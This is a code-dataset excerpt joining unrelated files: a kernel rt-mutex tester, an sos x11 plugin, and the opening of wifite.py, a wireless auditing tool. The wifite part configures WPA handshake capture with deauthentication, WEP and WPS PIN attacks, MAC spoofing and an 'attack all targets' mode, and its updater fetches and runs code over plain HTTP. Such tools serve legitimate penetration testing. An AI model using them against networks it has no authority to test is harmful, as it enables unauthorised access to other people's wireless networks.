fnoise = frequency_noise(self.engine.get_now() + hash(self.get_property("$id"))) # Each device has different frequency noise phase
result = self.tracking_value + fnoise * self.noise_level
return int(result / self.precision) * self.precision
| mit |
codificat/sos | sos/plugins/x11.py | 4 | 1225 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from sos.plugins import Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin
class X11(Plugin, RedHatPlugin, DebianPlugin, UbuntuPlugin):
"""X windowing system
"""
plugin_name = 'x11'
profiles = ('hardware', 'desktop')
files = ('/etc/X11',)
def setup(self):
self.add_copy_spec([
"/etc/X11",
"/var/log/Xorg.*.log",
"/var/log/XFree86.*.log",
])
self.add_forbidden_path("/etc/X11/X")
self.add_forbidden_path("/etc/X11/fontpath.d")
# vim: et ts=4 sw=4
| gpl-2.0 |
fefifofum/android_kernel_bq_maxwell2plus | scripts/rt-tester/rt-tester.py | 11005 | 5307 | #!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
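# Test specifications are colon-separated "command: opcode: threadid: data"
# lines, parsed below.  Illustrative snippet (the real cases ship as *.tst
# files next to this script in the kernel tree):
#   C: schedfifo:   0: 80
#   C: locknowait:  0: 0
#   T: locked:      0: 0
#   C: unlock:      0: 0
#   W: unlocked:    0: 0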
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
| gpl-2.0 |
redcodesick/wifite | wifite.py | 56 | 98589 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
wifite
author: derv82 at gmail
Licensed under the GNU General Public License Version 2 (GNU GPL v2),
available at: http://www.gnu.org/licenses/gpl-2.0.txt
(C) 2011 Derv Merkler
-----------------
TODO:
ignore root check when -cracked (afterward) (need root for -check?)
"cracked*" in list of AP's
Restore same command-line switch names from v1
If device already in monitor mode, check for and, if applicable, use macchanger
WPS
* Mention reaver automatically resumes sessions
* Warning about length of time required for WPS attack (*hours*)
* Show time since last successful attempt
* Percentage of tries/attempts ?
* Update code to work with reaver 1.4 ("x" sec/att)
WEP:
* ability to pause/skip/continue (done, not tested)
* Option to capture only IVS packets (uses --output-format ivs,csv)
- not compatible on older aircrack-ng's.
- Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works
- would cut down on size of saved .caps
reaver:
MONITOR ACTIVITY!
- Enter ESSID when executing (?)
- Ensure WPS key attempts have begun.
- If no attempts can be made, stop attack
- During attack, if no attempts are made within X minutes, stop attack & Print
- Reaver's output when unable to associate:
[!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF)
- If failed to associate for x minutes, stop attack (same as no attempts?)
MIGHTDO:
* WPA - crack (pyrit/cowpatty) (not really important)
* Test injection at startup? (skippable via command-line switch)
"""
#############
# LIBRARIES #
#############
import os # File management
import time # Measuring attack intervals
import random # Generating a random MAC address.
import errno # Error numbers
from sys import argv # Command-line arguments
from sys import stdout, stdin # Flushing
from shutil import copy # Copying .cap files
# Executing, communicating with, killing processes
from subprocess import Popen, call, PIPE
from signal import SIGINT, SIGTERM
import re # RegEx, Converting SSID to filename
import urllib # Check for new versions from the repo
################################
# GLOBAL VARIABLES IN ALL CAPS #
################################
REVISION = 85;
# WPA variables
WPA_DISABLE = False # Flag to skip WPA handshake capture
WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake
WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds)
WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds)
WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored
# Strip file path separator if needed
if WPA_HANDSHAKE_DIR != '' and WPA_HANDSHAKE_DIR[-1] == os.sep:
WPA_HANDSHAKE_DIR = WPA_HANDSHAKE_DIR[:-1]
WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks
WPA_DONT_CRACK = False # Flag to skip cracking of handshakes
WPA_DICTIONARY = '/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'
if not os.path.exists(WPA_DICTIONARY): WPA_DICTIONARY = ''
# Various programs to use when checking for a four-way handshake.
# True means the program must find a valid handshake in order for wifite to recognize a handshake.
# Not finding handshake short circuits result (ALL 'True' programs must find handshake)
WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th)
WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate.
WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast.
WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2)
# WEP variables
WEP_DISABLE = False # Flag for ignoring WEP networks
WEP_PPS = 600 # packets per second (Tx rate)
WEP_TIMEOUT = 600 # Amount of time to give each attack
WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng
WEP_CHOPCHOP = True #
WEP_FRAGMENT = True #
WEP_CAFFELATTE = True #
WEP_P0841 = True
WEP_HIRTE = True
WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking
WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure
WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks.
WEP_SAVE = False # Save packets.
# WPS variables
WPS_DISABLE = False # Flag to skip WPS scan and attacks
WPS_FINDINGS = [] # List of (successful) results of WPS attacks
WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt
WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0)
WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely.
# Program variables
WIRELESS_IFACE = '' # User-defined interface
TARGET_CHANNEL = 0 # User-defined channel to scan on
TARGET_ESSID = '' # User-defined ESSID of specific target to attack
TARGET_BSSID = '' # User-defined BSSID of specific target to attack
IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode
# It's our job to put it out of monitor mode after the attacks
ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing)
DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer
TARGETS_REMAINING = 0 # Number of access points remaining to attack
WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects)
THIS_MAC = '' # The interfaces current MAC address.
SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets
CRACKED_TARGETS = [] # List of targets we have already cracked
ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone*
ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target
VERBOSE_APS = True # Print access points as they appear
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
if os.getuid() != 0:
print R+' [!]'+O+' ERROR:'+G+' wifite'+O+' must be run as '+R+'root'+W
print R+' [!]'+O+' login as root ('+W+'su root'+O+') or try '+W+'sudo ./wifite.py'+W
exit(1)
if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]: # OSX support, 'cause why not?
print O+' [!]'+R+' WARNING:'+G+' wifite'+W+' must be run on '+O+'linux'+W
exit(1)
# Create temporary directory to work in
from tempfile import mkdtemp
temp = mkdtemp(prefix='wifite')
if not temp.endswith(os.sep):
temp += os.sep
# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')
###################
# DATA STRUCTURES #
###################
class CapFile:
"""
Holds data about an access point's .cap file, including AP's ESSID & BSSID.
"""
def __init__(self, filename, ssid, bssid):
self.filename = filename
self.ssid = ssid
self.bssid = bssid
class Target:
"""
Holds data for a Target (aka Access Point aka Router)
"""
def __init__(self, bssid, power, data, channel, encryption, ssid):
self.bssid = bssid
self.power = power
self.data = data
self.channel = channel
self.encryption = encryption
self.ssid = ssid
self.wps = False # Default to non-WPS-enabled router.
self.key = ''
class Client:
"""
Holds data for a Client (device connected to Access Point/Router)
"""
def __init__(self, bssid, station, power):
self.bssid = bssid
self.station = station
self.power = power
##################
# MAIN FUNCTIONS #
##################
def main():
"""
Where the magic happens.
"""
global TARGETS_REMAINING, THIS_MAC, CRACKED_TARGETS
CRACKED_TARGETS = load_cracked() # Load previously-cracked APs from file
handle_args() # Parse args from command line, set global variables.
initial_check() # Ensure required programs are installed.
# The "get_iface" method anonymizes the MAC address (if needed)
# and puts the interface into monitor mode.
iface = get_iface()
THIS_MAC = get_mac_address(iface) # Store current MAC address
(targets, clients) = scan(iface=iface, channel=TARGET_CHANNEL)
try:
index = 0
while index < len(targets):
target = targets[index]
# Check if we have already cracked this target
for already in CRACKED_TARGETS:
if already.bssid == targets[index].bssid:
print R+'\n [!]'+O+' you have already cracked this access point\'s key!'+W
print R+' [!] %s' % (C+already.ssid+W+': "'+G+already.key+W+'"')
ri = raw_input(GR+' [+] '+W+'do you want to crack this access point again? ('+G+'y/'+O+'n'+W+'): ')
if ri.lower() == 'n':
targets.pop(index)
index -= 1
break
# Check if handshakes already exist, ask user whether to skip targets or save new handshakes
handshake_file = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') + '.cap'
if os.path.exists(handshake_file):
print R+'\n [!] '+O+'you already have a handshake file for %s:' % (C+target.ssid+W)
print ' %s\n' % (G+handshake_file+W)
print GR+' [+]'+W+' do you want to '+G+'[s]kip'+W+', '+O+'[c]apture again'+W+', or '+R+'[o]verwrite'+W+'?'
ri = 'x'
while ri != 's' and ri != 'c' and ri != 'o':
ri = raw_input(GR+' [+] '+W+'enter '+G+'s'+W+', '+O+'c,'+W+' or '+R+'o'+W+': '+G).lower()
print W+"\b",
if ri == 's':
targets.pop(index)
index -= 1
elif ri == 'o':
remove_file(handshake_file)
continue
index += 1
except KeyboardInterrupt:
print '\n '+R+'(^C)'+O+' interrupted\n'
exit_gracefully(0)
wpa_success = 0
wep_success = 0
wpa_total = 0
wep_total = 0
TARGETS_REMAINING = len(targets)
for t in targets:
TARGETS_REMAINING -= 1
# Build list of clients connected to target
ts_clients = []
for c in clients:
if c.station == t.bssid:
ts_clients.append(c)
print ''
if t.encryption.find('WPA') != -1:
need_handshake = True
if not WPS_DISABLE and t.wps:
need_handshake = not wps_attack(iface, t)
wpa_total += 1
if not need_handshake: wpa_success += 1
if TARGETS_REMAINING < 0: break
if not WPA_DISABLE and need_handshake:
wpa_total += 1
if wpa_get_handshake(iface, t, ts_clients):
wpa_success += 1
elif t.encryption.find('WEP') != -1:
wep_total += 1
if attack_wep(iface, t, ts_clients):
wep_success += 1
else: print R+' unknown encryption:',t.encryption,W
# If user wants to stop attacking
if TARGETS_REMAINING <= 0: break
if wpa_total + wep_total > 0:
# Attacks are done! Show results to user
print ''
print GR+' [+] %s%d attack%s completed:%s' % (G, wpa_total + wep_total, '' if wpa_total+wep_total == 1 else 's', W)
print ''
if wpa_total > 0:
if wpa_success == 0: print GR+' [+]'+R,
elif wpa_success == wpa_total: print GR+' [+]'+G,
else: print GR+' [+]'+O,
print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W)
for finding in WPA_FINDINGS:
print ' ' + C+finding+W
if wep_total > 0:
if wep_success == 0: print GR+' [+]'+R,
elif wep_success == wep_total: print GR+' [+]'+G,
else: print GR+' [+]'+O,
print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W)
for finding in WEP_FINDINGS:
print ' ' + C+finding+W
caps = len(WPA_CAPS_TO_CRACK)
if caps > 0 and not WPA_DONT_CRACK:
print GR+' [+]'+W+' starting '+G+'WPA cracker'+W+' on %s%d handshake%s' % (G, caps, W if caps == 1 else 's'+W)
for cap in WPA_CAPS_TO_CRACK:
wpa_crack(cap)
print ''
exit_gracefully(0)
def rename(old, new):
"""
Renames file 'old' to 'new', works with separate partitions.
Thanks to hannan.sadar
"""
try:
os.rename(old, new)
except os.error, detail:
if detail.errno == errno.EXDEV:
try:
copy(old, new)
except:
os.unlink(new)
raise
os.unlink(old)
# if desired, deal with other errors
else:
raise
def initial_check():
"""
Ensures required programs are installed.
"""
global WPS_DISABLE
airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng']
for air in airs:
if program_exists(air): continue
print R+' [!]'+O+' required program not found: %s' % (R+air+W)
print R+' [!]'+O+' this program is bundled with the aircrack-ng suite:'+W
print R+' [!]'+O+' '+C+'http://www.aircrack-ng.org/'+W
print R+' [!]'+O+' or: '+W+'sudo apt-get install aircrack-ng\n'+W
exit_gracefully(1)
if not program_exists('iw'):
print R+' [!]'+O+' airmon-ng requires the program %s\n' % (R+'iw'+W)
exit_gracefully(1)
printed = False
# Check reaver
if not program_exists('reaver'):
printed = True
print R+' [!]'+O+' the program '+R+'reaver'+O+' is required for WPS attacks'+W
print R+' '+O+' available at '+C+'http://code.google.com/p/reaver-wps'+W
WPS_DISABLE = True
elif not program_exists('walsh') and not program_exists('wash'):
printed = True
print R+' [!]'+O+' reaver\'s scanning tool '+R+'walsh'+O+' (or '+R+'wash'+O+') was not found'+W
print R+' [!]'+O+' please re-install reaver or install walsh/wash separately'+W
# Check handshake-checking apps
recs = ['tshark', 'pyrit', 'cowpatty']
for rec in recs:
if program_exists(rec): continue
printed = True
print R+' [!]'+O+' the program %s is not required, but is recommended%s' % (R+rec+O, W)
if printed: print ''
def handle_args():
"""
Handles command-line arguments, sets global variables.
"""
global WIRELESS_IFACE, TARGET_CHANNEL, DO_NOT_CHANGE_MAC, TARGET_ESSID, TARGET_BSSID
global WPA_DISABLE, WPA_STRIP_HANDSHAKE, WPA_DEAUTH_TIMEOUT, WPA_ATTACK_TIMEOUT
global WPA_DONT_CRACK, WPA_DICTIONARY, WPA_HANDSHAKE_TSHARK, WPA_HANDSHAKE_PYRIT
global WPA_HANDSHAKE_AIRCRACK, WPA_HANDSHAKE_COWPATTY
global WEP_DISABLE, WEP_PPS, WEP_TIMEOUT, WEP_ARP_REPLAY, WEP_CHOPCHOP, WEP_FRAGMENT
global WEP_CAFFELATTE, WEP_P0841, WEP_HIRTE, WEP_CRACK_AT_IVS, WEP_IGNORE_FAKEAUTH
global WEP_SAVE, SHOW_MAC_IN_SCAN, ATTACK_ALL_TARGETS, ATTACK_MIN_POWER
global WPS_DISABLE, WPS_TIMEOUT, WPS_RATIO_THRESHOLD, WPS_MAX_RETRIES
global VERBOSE_APS
args = argv[1:]
if args.count('-h') + args.count('--help') + args.count('?') + args.count('-help') > 0:
help()
exit_gracefully(0)
set_encrypt = False
set_hscheck = False
set_wep = False
capfile = '' # Filename of .cap file to analyze for handshakes
try:
for i in xrange(0, len(args)):
if not set_encrypt and (args[i] == '-wpa' or args[i] == '-wep' or args[i] == '-wps'):
WPS_DISABLE = True
WPA_DISABLE = True
WEP_DISABLE = True
set_encrypt = True
if args[i] == '-wpa':
print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks (use '+G+'-wps'+W+' for WPS scan)'
WPA_DISABLE = False
elif args[i] == '-wep':
print GR+' [+]'+W+' targeting '+G+'WEP'+W+' encrypted networks'
WEP_DISABLE = False
elif args[i] == '-wps':
print GR+' [+]'+W+' targeting '+G+'WPS-enabled'+W+' networks'
WPS_DISABLE = False
elif args[i] == '-c':
i += 1
try: TARGET_CHANNEL = int(args[i])
except ValueError: print O+' [!]'+R+' invalid channel: '+O+args[i]+W
except IndexError: print O+' [!]'+R+' no channel given!'+W
else: print GR+' [+]'+W+' channel set to %s' % (G+args[i]+W)
elif args[i] == '-mac':
print GR+' [+]'+W+' mac address anonymizing '+G+'enabled'+W
print O+' note: only works if device is not already in monitor mode!'+W
DO_NOT_CHANGE_MAC = False
elif args[i] == '-i':
i += 1
WIRELESS_IFACE = args[i]
print GR+' [+]'+W+' set interface: %s' % (G+args[i]+W)
elif args[i] == '-e':
i += 1
try: TARGET_ESSID = args[i]
except ValueError: print R+' [!]'+O+' no ESSID given!'+W
else: print GR+' [+]'+W+' targeting ESSID "%s"' % (G+args[i]+W)
elif args[i] == '-b':
i += 1
try: TARGET_BSSID = args[i]
except ValueError: print R+' [!]'+O+' no BSSID given!'+W
else: print GR+' [+]'+W+' targeting BSSID "%s"' % (G+args[i]+W)
elif args[i] == '-showb' or args[i] == '-showbssid':
SHOW_MAC_IN_SCAN = True
print GR+' [+]'+W+' target MAC address viewing '+G+'enabled'+W
elif args[i] == '-all' or args[i] == '-hax0ritna0':
print GR+' [+]'+W+' targeting '+G+'all access points'+W
ATTACK_ALL_TARGETS = True
elif args[i] == '-pow' or args[i] == '-power':
i += 1
try:
ATTACK_MIN_POWER = int(args[i])
except ValueError: print R+' [!]'+O+' invalid power level: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no power level given!'+W
else: print GR+' [+]'+W+' minimum target power set to %s' % (G+args[i] + "dB"+W)
elif args[i] == '-q' or args[i] == '-quiet':
VERBOSE_APS = False
print GR+' [+]'+W+' list of APs during scan '+O+'disabled'+W
elif args[i] == '-check':
i += 1
try: capfile = args[i]
except IndexError:
print R+' [!]'+O+' unable to analyze capture file'+W
print R+' [!]'+O+' no cap file given!\n'+W
exit_gracefully(1)
else:
if not os.path.exists(capfile):
print R+' [!]'+O+' unable to analyze capture file!'+W
print R+' [!]'+O+' file not found: '+R+capfile+'\n'+W
exit_gracefully(1)
elif args[i] == '-upgrade' or args[i] == '-update':
upgrade()
exit(0)
elif args[i] == '-cracked':
if len(CRACKED_TARGETS) == 0:
                    print R+' [!]'+O+' there are no cracked access points saved to '+R+'cracked.txt\n'+W
exit_gracefully(1)
print GR+' [+]'+W+' '+W+'previously cracked access points'+W+':'
for victim in CRACKED_TARGETS:
print ' %s (%s) : "%s"' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W)
print ''
exit_gracefully(0)
# WPA
            if not set_hscheck and (args[i] == '-tshark' or args[i] == '-cowpatty' or args[i] == '-aircrack' or args[i] == '-pyrit'):
WPA_HANDSHAKE_TSHARK = False
WPA_HANDSHAKE_PYRIT = False
WPA_HANDSHAKE_COWPATTY = False
WPA_HANDSHAKE_AIRCRACK = False
set_hscheck = True
elif args[i] == '-strip':
WPA_STRIP_HANDSHAKE = True
print GR+' [+]'+W+' handshake stripping '+G+'enabled'+W
elif args[i] == '-wpadt':
i += 1
WPA_DEAUTH_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA deauth timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-wpat':
i += 1
WPA_ATTACK_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA attack timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-crack':
WPA_DONT_CRACK = False
print GR+' [+]'+W+' WPA cracking '+G+'enabled'+W
elif args[i] == '-dict':
i += 1
try:
WPA_DICTIONARY = args[i]
except IndexError: print R+' [!]'+O+' no WPA dictionary given!'
else:
if os.path.exists(args[i]):
print GR+' [+]'+W+' WPA dictionary set to %s' % (G+args[i]+W)
else:
print R+' [!]'+O+' WPA dictionary file not found: %s' % (args[i])
if args[i] == '-tshark':
WPA_HANDSHAKE_TSHARK = True
print GR+' [+]'+W+' tshark handshake verification '+G+'enabled'+W
if args[i] == '-pyrit':
WPA_HANDSHAKE_PYRIT = True
print GR+' [+]'+W+' pyrit handshake verification '+G+'enabled'+W
if args[i] == '-aircrack':
WPA_HANDSHAKE_AIRCRACK = True
print GR+' [+]'+W+' aircrack handshake verification '+G+'enabled'+W
if args[i] == '-cowpatty':
WPA_HANDSHAKE_COWPATTY = True
print GR+' [+]'+W+' cowpatty handshake verification '+G+'enabled'+W
# WEP
            if not set_wep and (args[i] == '-chopchop' or args[i] == '-fragment' or
                                args[i] == '-caffelatte' or args[i] == '-arpreplay' or
                                args[i] == '-p0841' or args[i] == '-hirte'):
                WEP_CHOPCHOP = False
                WEP_ARP_REPLAY = False
                WEP_CAFFELATTE = False
                WEP_FRAGMENT = False
                WEP_P0841 = False
                WEP_HIRTE = False
                set_wep = True
if args[i] == '-chopchop':
print GR+' [+]'+W+' WEP chop-chop attack '+G+'enabled'+W
WEP_CHOPCHOP = True
if args[i] == '-fragment' or args[i] == '-frag' or args[i] == '-fragmentation':
print GR+' [+]'+W+' WEP fragmentation attack '+G+'enabled'+W
WEP_FRAGMENT = True
if args[i] == '-caffelatte':
print GR+' [+]'+W+' WEP caffe-latte attack '+G+'enabled'+W
WEP_CAFFELATTE = True
if args[i] == '-arpreplay':
print GR+' [+]'+W+' WEP arp-replay attack '+G+'enabled'+W
                WEP_ARP_REPLAY = True
if args[i] == '-p0841':
print GR+' [+]'+W+' WEP p0841 attack '+G+'enabled'+W
WEP_P0841 = True
if args[i] == '-hirte':
print GR+' [+]'+W+' WEP hirte attack '+G+'enabled'+W
WEP_HIRTE = True
            if args[i] == '-nofake' or args[i] == '-nofakeauth':
print GR+' [+]'+W+' ignoring failed fake-authentication '+R+'disabled'+W
WEP_IGNORE_FAKEAUTH = False
if args[i] == '-wept' or args[i] == '-weptime':
i += 1
try:
WEP_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WEP attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-pps':
i += 1
try:
WEP_PPS = int(args[i])
except ValueError: print R+' [!]'+O+' invalid value: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no value given!'+W
else: print GR+' [+]'+W+' packets-per-second rate set to %s' % (G+args[i] + " packets/sec"+W)
if args[i] == '-save' or args[i] == '-wepsave':
WEP_SAVE = True
print GR+' [+]'+W+' WEP .cap file saving '+G+'enabled'+W
# WPS
if args[i] == '-wpst' or args[i] == '-wpstime':
i += 1
try:
WPS_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WPS attack timeout set to %s' % (G+args[i] + " seconds"+W)
            if args[i] == '-wpsratio' or args[i] == '-wpsr':
i += 1
try:
WPS_RATIO_THRESHOLD = float(args[i])
except ValueError: print R+' [!]'+O+' invalid percentage: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no ratio given!'+W
else: print GR+' [+]'+W+' minimum WPS tries/attempts threshold set to %s' % (G+args[i] + ""+W)
if args[i] == '-wpsmaxr' or args[i] == '-wpsretry':
i += 1
try:
WPS_MAX_RETRIES = int(args[i])
except ValueError: print R+' [!]'+O+' invalid number: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no number given!'+W
else: print GR+' [+]'+W+' WPS maximum retries set to %s' % (G+args[i] + " retries"+W)
except IndexError:
print '\nindexerror\n\n'
if capfile != '':
analyze_capfile(capfile)
print ''
def banner():
"""
Displays ASCII art of the highest caliber.
"""
global REVISION
print ''
print G+" .;' `;, "
print G+" .;' ,;' `;, `;, "+W+"WiFite v2 (r" + str(REVISION) + ")"
print G+".;' ,;' ,;' `;, `;, `;, "
print G+":: :: : "+GR+"( )"+G+" : :: :: "+GR+"automated wireless auditor"
print G+"':. ':. ':. "+GR+"/_\\"+G+" ,:' ,:' ,:' "
print G+" ':. ':. "+GR+"/___\\"+G+" ,:' ,:' "+GR+"designed for Linux"
print G+" ':. "+GR+"/_____\\"+G+" ,:' "
print G+" "+GR+"/ \\"+G+" "
print W
def upgrade():
"""
Checks for new version, prompts to upgrade, then
replaces this script with the latest from the repo
"""
global REVISION
try:
print GR+' [!]'+W+' upgrading requires an '+G+'internet connection'+W
print GR+' [+]'+W+' checking for latest version...'
(revision, description, date_changed) = get_revision()
if revision == -1:
print R+' [!]'+O+' unable to access googlecode'+W
elif revision > REVISION:
print GR+' [!]'+W+' a new version is '+G+'available!'+W
print GR+' [-]'+W+' revision: '+G+str(revision)+W
print GR+' [-]'+W+' description: '+G+description+W
print GR+' [-]'+W+' date added: '+G+date_changed+W
response = raw_input(GR+' [+]'+W+' do you want to upgrade to the latest version? (y/n): ')
if not response.lower().startswith('y'):
print GR+' [-]'+W+' upgrading '+O+'aborted'+W
exit_gracefully(0)
return
# Download script, replace with this one
print GR+' [+] '+G+'downloading'+W+' update...'
try:
sock = urllib.urlopen('http://wifite.googlecode.com/svn/trunk/wifite.py')
page = sock.read()
except IOError:
page = ''
if page == '':
print R+' [+] '+O+'unable to download latest version'+W
exit_gracefully(1)
# Create/save the new script
f=open('wifite_new.py','w')
f.write(page)
f.close()
# The filename of the running script
this_file = __file__
if this_file.startswith('./'):
this_file = this_file[2:]
# create/save a shell script that replaces this script with the new one
f = open('update_wifite.sh','w')
f.write('''#!/bin/sh\n
rm -rf ''' + this_file + '''\n
mv wifite_new.py ''' + this_file + '''\n
rm -rf update_wifite.sh\n
chmod +x ''' + this_file + '''\n
''')
f.close()
# Change permissions on the script
returncode = call(['chmod','+x','update_wifite.sh'])
if returncode != 0:
print R+' [!]'+O+' permission change returned unexpected code: '+str(returncode)+W
exit_gracefully(1)
# Run the script
returncode = call(['sh','update_wifite.sh'])
if returncode != 0:
print R+' [!]'+O+' upgrade script returned unexpected code: '+str(returncode)+W
exit_gracefully(1)
print GR+' [+] '+G+'updated!'+W+' type "./' + this_file + '" to run again'
else:
print GR+' [-]'+W+' your copy of wifite is '+G+'up to date'+W
except KeyboardInterrupt:
print R+'\n (^C)'+O+' wifite upgrade interrupted'+W
